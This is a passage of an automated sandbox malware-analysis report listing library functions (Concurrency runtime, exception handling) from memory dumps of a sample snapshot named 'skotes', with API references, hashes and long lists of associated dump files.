API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
String ID:
API String ID: 1321587334-0
Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction ID: e80cf76bb90d4b83ff5cf9a0939ff877604985d568bc9a9fcea241cccaa3ebda
Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction Fuzzy Hash: 0481BF71B00526ABCB18DF69FA9057EB7F1BB48704B94403ED441A3741EBB8A981CB9D

Function 004269DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426A51
List.LIBCONCRT ref: 00426A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426AB9
List.LIBCONCRT ref: 00426AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426B20
List.LIBCONCRT ref: 00426B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426B68

Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425EF7
Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425F09

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction ID: 579499c82c18d5a5ade90e723c63f8c40f3c28f02b2f1580fedc01109288aa91
Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction Fuzzy Hash: 9C516170B00229ABDB04DF65D495BEEB7A8FF08304F45406EE915EB381DB78AE45CB94

Function 004352A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 004353A0
type_info::operator==.LIBVCRUNTIME ref: 004353C7
___TypeMatch.LIBVCRUNTIME ref: 004354D3
IsInExceptionSpec.LIBVCRUNTIME ref: 004355AE
CallUnexpected.LIBVCRUNTIME ref: 00435650

Strings

csm, xrefs: 004353FE
csm, xrefs: 004352E0
csm, xrefs: 0043534D

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 4162181273-393685449
Opcode ID: a333619f4898329af32b3d93ce64bfd70127bcb43ac65579a31d58dbbafa8e18
Instruction ID: 7946f23dea792be26d4820a62e4550dff79cbb7357508b3bf55c7f92dc133849
Opcode Fuzzy Hash: a333619f4898329af32b3d93ce64bfd70127bcb43ac65579a31d58dbbafa8e18
Instruction Fuzzy Hash: C3C1AA71800609EFCF19DF95C881AAEBBB5BF1C315F04615BE8156B206C338EA51CF99

Function 00434840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00434877
___except_validate_context_record.LIBVCRUNTIME ref: 0043487F
_ValidateLocalCookies.LIBCMT ref: 00434908
__IsNonwritableInCurrentImage.LIBCMT ref: 00434933
_ValidateLocalCookies.LIBCMT ref: 00434988

Strings

csm, xrefs: 0043491D
S9C, xrefs: 00434925, 0043492E, 0043493F

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: S9C$csm
API String ID: 1170836740-582408667
Opcode ID: f50a35cc9b0cd1d54b3ada07bdb3590510d73737303dcd081f3ff4d5673c6e04
Instruction ID: 6575625a84691e9b1f9b7e8611f910fc559112cced3487189da3a48804891882
Opcode Fuzzy Hash: f50a35cc9b0cd1d54b3ada07bdb3590510d73737303dcd081f3ff4d5673c6e04
Instruction Fuzzy Hash: 7141E874A00208ABCF10DF69C844ADF7BB4BF89318F14815BE8149B392D779EA11CF99

Function 00427364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273B0
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427440

Strings

ppVirtualProcessorRoots, xrefs: 00427438
count, xrefs: 0042737E

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3897347962-3650809737
Opcode ID: 458ac73997a2f70f37004ddd16129de3859d25f13cf3a168d1a694e5b8c776cb
Instruction ID: 910b0151320ec7fd7557316ad521234f334c06ab70371bbe18cdfb5d61862d5e
Opcode Fuzzy Hash: 458ac73997a2f70f37004ddd16129de3859d25f13cf3a168d1a694e5b8c776cb
Instruction Fuzzy Hash: A8219334B00229EFCB10EF55D485AAEBBB5BF09344F54406AEC0197351CB38AE05CB98

Function 0041EE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041EEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EF0F
Concurrency::Context::Block.LIBCONCRT ref: 0041EF31

Strings

iA, xrefs: 0041EED0

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
